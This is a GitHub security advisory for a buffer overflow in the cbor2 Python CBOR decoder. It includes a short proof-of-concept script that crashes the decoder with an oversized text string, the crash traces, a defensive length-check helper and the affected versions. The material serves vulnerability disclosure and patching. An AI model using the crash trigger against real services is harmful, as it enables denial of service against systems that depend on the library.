GHSA-375g-39jq-vq7m

Published: 21 Feb 2024
Source: github
GitHub: Reviewed
CVSS3: 7.5

Description

Potential buffer overflow in CBOR2 decoder

Summary

Ever since https://github.com/agronholm/cbor2/pull/204 (or specifically https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542) was merged, I can create a reproducible crash when running the snippet under PoC on a current Debian bullseye arm64 on a Raspberry Pi 3 (I was not able to reproduce this on my x86_64 laptop with Python 3.11; I suspect because there is enough memory to allocate still).

Details

PoC

```python
import json
import concurrent.futures
import cbor2


def test():
    obj = "x" * 131128          # a text string long enough to trigger the crash
    cbor_enc = cbor2.dumps(obj)
    return cbor2.loads(cbor_enc)


# Decode in a child process so the native crash surfaces as BrokenProcessPool
# instead of killing the interpreter running the script.
if __name__ == "__main__":
    with concurrent.futures.ProcessPoolExecutor() as executor:
        future = executor.submit(test)
        print(future.result())
```

```
malloc(): unsorted double linked list corrupted
Traceback (most recent call last):
  File "test.py", line 14, in <module>
    print(future.result())
  File "/usr/lib/python3.9/concurrent/futures/_base.py", line 440, in result
    return self.__get_result()
  File "/usr/lib/python3.9/concurrent/futures/_base.py", line 389, in __get_result
    raise self._exception
concurrent.futures.process.BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending.
```

If one calls it without the indirection via the pool executor, a SystemError is shown that hides the buffer overflow.

```python
import json
import cbor2


def test():
    obj = "x" * 131128          # same oversized text string as above
    cbor_enc = cbor2.dumps(obj)
    return cbor2.loads(cbor_enc)


# Called directly, the decoder returns NULL and Python reports a SystemError,
# which masks the underlying memory corruption.
print(test())
```

```
Traceback (most recent call last):
  File "test.py", line 12, in <module>
    print(test())
  File "test.py", line 9, in test
    return cbor2.loads(cbor_enc)
SystemError: <built-in function loads> returned NULL without setting an error
```

Impact

An attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object.
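Upgrading to the fixed release is the remedy the advisory names. As an added defence-in-depth check that is not part of the advisory or of cbor2, the code below parses the head of the first CBOR data item (initial byte plus length argument, RFC 8949) and rejects top-level text or byte strings whose declared length exceeds a caller-chosen limit before the bytes reach the decoder. The sample heads, including the 5-byte head that cbor2.dumps("x" * 131128) produces, and the limit value are constructed assumptions.

```python
import struct

# CBOR major types from RFC 8949 section 3.1
MT_BYTE_STRING = 2
MT_TEXT_STRING = 3

# Head of the PoC payload cbor2.dumps("x" * 131128): major type 3, additional
# info 26 (uint32 argument), argument 0x00020038 = 131128 (constructed here).
POC_HEAD = bytes.fromhex("7a00020038")


def cbor_head(data: bytes):
    """Decode the head of the first item: (major_type, argument, head_len).

    argument is None for an indefinite-length item (additional info 31).
    Raises ValueError on an empty, truncated or reserved (28-30) encoding.
    """
    if not data:
        raise ValueError("empty CBOR input")
    initial = data[0]
    major, info = initial >> 5, initial & 0x1F
    if info < 24:
        return major, info, 1
    if info == 31:
        return major, None, 1
    widths = {24: (">B", 1), 25: (">H", 2), 26: (">I", 4), 27: (">Q", 8)}
    if info not in widths:
        raise ValueError(f"reserved additional info {info}")
    fmt, size = widths[info]
    if len(data) < 1 + size:
        raise ValueError("truncated CBOR head")
    (argument,) = struct.unpack(fmt, data[1:1 + size])
    return major, argument, 1 + size


def string_length_ok(data: bytes, limit: int) -> bool:
    """True unless the top-level item is a text/byte string declaring more
    than `limit` bytes. Indefinite-length strings are rejected because their
    size is unknown until every chunk has been consumed."""
    major, argument, _ = cbor_head(data)
    if major not in (MT_BYTE_STRING, MT_TEXT_STRING):
        return True
    if argument is None:
        return False
    return argument <= limit


if __name__ == "__main__":
    LIMIT = 64 * 1024  # assumed deployment ceiling, not a value from the advisory
    print(string_length_ok(POC_HEAD, LIMIT))    # False: 131128 bytes declared
    print(string_length_ok(b"\x63abc", LIMIT))  # True: 3-byte text string
```

The check only inspects the outermost item, so strings nested inside arrays or maps pass through untouched; it narrows exposure but does not replace the 5.6.2 upgrade.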

Packages

Name: cbor2 (pip)
Affected versions: >= 5.5.1, < 5.6.2
Fixed version: 5.6.2

EPSS

Percentile: 74%
0.00809
Low

CVSS3: 7.5 High

Weaknesses

CWE-120

Related vulnerabilities

CVSS3: 7.5
ubuntu
almost 2 years ago

cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue.

CVSS3: 7.5
nvd
almost 2 years ago

cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue.

CVSS3: 7.5
debian
almost 2 years ago

cbor2 provides encoding and decoding for the Concise Binary Object Rep ...

suse-cvrf
2 months ago

Security update for python-cbor2
